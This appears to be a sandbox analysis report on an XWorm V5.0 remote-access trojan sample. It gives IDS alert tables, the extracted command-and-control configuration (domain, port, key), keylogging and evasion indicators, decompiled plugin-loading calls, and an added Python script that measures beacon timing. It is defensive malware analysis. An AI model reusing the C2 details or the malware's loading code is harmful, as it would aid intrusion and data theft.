2025-03-30T21:31:44.848978+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:48.304666+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:48.537951+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:50.547459+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:52.620940+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:53.133513+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:54.761513+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:59.708964+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:32:05.782262+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:32:19.664125+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:32:19.947511+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:32:20.313328+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
Suricata IDS alerts: SID 2852874 (ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-30T21:28:30.618078+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:57.616715+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:27.616448+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:27.607442+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:57.713540+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:27.613966+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:57.611278+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
Suricata IDS alerts: SID 2853193 (ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-30T21:30:02.673286+0200 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
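The SID 2852874 rows (the inbound PING command) arrive about every 30 seconds, with one 60-second gap where a beacon was not alerted on; that cadence is what a hunter keys on when the signature itself is not available. The Python below is an added example, not part of the Joe Sandbox report and not Suricata's: it parses alert rows in the column order of the tables (timestamp, SID, severity, classtype, source IP, source port, destination IP, destination port, protocol) and estimates the beacon period per signature. The rows it carries are copied from the report (all seven PING rows and the first ten check-in rows of SID 2852870, to keep the block short); the 1.5x gap rule for a missed beacon and the 20% jitter bound are illustrative thresholds, not values from the report.

```python
from datetime import datetime
from statistics import median

# Constructed input: alert rows copied from the report's tables, pipe-separated in the
# column order timestamp | SID | severity | classtype | src ip | src port | dst ip | dst port | proto.
ALERT_ROWS = """\
2025-03-30T21:28:30.618078+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:57.616715+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:27.616448+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:27.607442+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:57.713540+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:27.613966+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:57.611278+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:30.618078+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:37.026992+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:50.076928+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:57.616715+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:03.141015+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:16.201894+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:25.297158+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:27.616448+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:30.973164+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:31.199153+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
"""

TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%f%z"   # %z accepts the +0200 form used in the tables


def parse_rows(text: str) -> list[dict]:
    """Parse pipe-separated alert rows into dicts with a timezone-aware datetime."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sev, cls, sip, sport, dip, dport, proto = (f.strip() for f in line.split("|"))
        alerts.append({
            "ts": datetime.strptime(ts, TS_FORMAT), "sid": sid, "severity": int(sev),
            "classtype": cls, "src": f"{sip}:{sport}", "dst": f"{dip}:{dport}", "proto": proto,
        })
    return alerts


def beacon_stats(alerts: list[dict], sid: str, gap_factor: float = 1.5,
                 jitter_ratio: float = 0.2) -> dict:
    """Estimate the beacon period of one signature from alert inter-arrival times.

    period    median gap between consecutive alerts (robust to a dropped alert)
    missed    gaps larger than gap_factor * period, i.e. beacons the sensor did not alert on
    jitter    largest deviation from the period among the remaining gaps
    periodic  True when jitter stays within jitter_ratio of the period over >= 3 gaps
    gap_factor and jitter_ratio are illustrative thresholds, not values from the report.
    """
    times = sorted(a["ts"] for a in alerts if a["sid"] == sid)
    deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(deltas) < 3:
        return {"sid": sid, "count": len(times), "period": None,
                "missed": 0, "jitter": None, "periodic": False}
    period = median(deltas)
    regular = [d for d in deltas if d <= gap_factor * period]   # never empty: median bound
    jitter = max(abs(d - period) for d in regular)
    return {
        "sid": sid,
        "count": len(times),
        "period": period,
        "missed": len(deltas) - len(regular),
        "jitter": jitter,
        "periodic": len(regular) >= 3 and jitter <= jitter_ratio * period,
    }


if __name__ == "__main__":
    parsed = parse_rows(ALERT_ROWS)
    for sid in ("2852874", "2852870"):
        s = beacon_stats(parsed, sid)
        print(f"SID {s['sid']}: {s['count']} alerts, period {s['period']:.1f}s, "
              f"missed {s['missed']}, jitter {s['jitter']:.2f}s, periodic={s['periodic']}")
```

On these rows the PING signature comes out at a 30-second period with one missed beacon and is flagged periodic; the generic check-in signature, which fires on command traffic rather than keep-alives, has gaps from under a second to 13 seconds and is not. The median-based period is what makes the single 60-second gap register as a missed beacon instead of dragging the estimate up.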


            AV Detection

Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Avira: detected
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Malware Configuration Extractor: Xworm {"C2 url": ["jeggawire.ddns.net"], "Port": 1111, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.0"}
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Virustotal: Detection: 75%
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | ReversingLabs: Detection: 86%
Source: Submitted Sample | Neural Call Log Analysis: 95.7%
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | String decryptor: jeggawire.ddns.net
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | String decryptor: 1111
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | String decryptor: <123456789>
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | String decryptor: <Xwormmm>
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | String decryptor: XWorm V5.0
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | String decryptor: USB.exe
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.65.134.56:1111 -> 192.168.2.8:49682
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 176.65.134.56:1111 -> 192.168.2.8:49682
Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49682 -> 176.65.134.56:1111
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49682 -> 176.65.134.56:1111
Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49682 -> 176.65.134.56:1111
Source: Malware configuration extractor | URLs: jeggawire.ddns.net
Source: unknown | DNS query: name: jeggawire.ddns.net
Source: global traffic | TCP traffic: 192.168.2.8:49682 -> 176.65.134.56:1111
Source: Joe Sandbox View | ASN Name: DIOGELO-ASGB
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: jeggawire.ddns.net
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, XLogger.cs | .Net Code: KeyboardLayout

            System Summary

Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Code function: 0_2_00007FF936866876
Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Code function: 0_2_00007FF936867622
Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Code function: 0_2_00007FF936862A28
Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Code function: 0_2_00007FF93686B054
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000000.840323147.00000000005DC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename jegganewfile.exe4 vs 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Binary or memory string: OriginalFilename jegganewfile.exe4 vs 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Mutant created: NULL
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Mutant created: \Sessions\1\BaseNamedObjects\FNajPvJhcrtOPazO
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Virustotal: Detection: 75%
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | ReversingLabs: Detection: 86%
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: avicap32.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: msvfw32.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Messages.cs | .Net Code: Memory
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Code function: 0_2_00007FF936861789 push ebx; retf 0_2_00007FF93686178A
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Memory allocated: D00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Memory allocated: 1A9C0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Window / User API: threadDelayed 4894
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Window / User API: threadDelayed 4938
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe TID: 6476 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe TID: 6380 | Thread sleep count: 4894 > 30
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe TID: 6380 | Thread sleep count: 4938 > 30
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | File Volume queried: C:\ FullSizeInformation
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3290293188.000000001B860000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dll <add name="AspNetSqlRoleProvider" connectionStringName="LocalSqlServer" applicationName="/"
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | Memory allocated: page read and write | page guard
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.0000000002D74000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
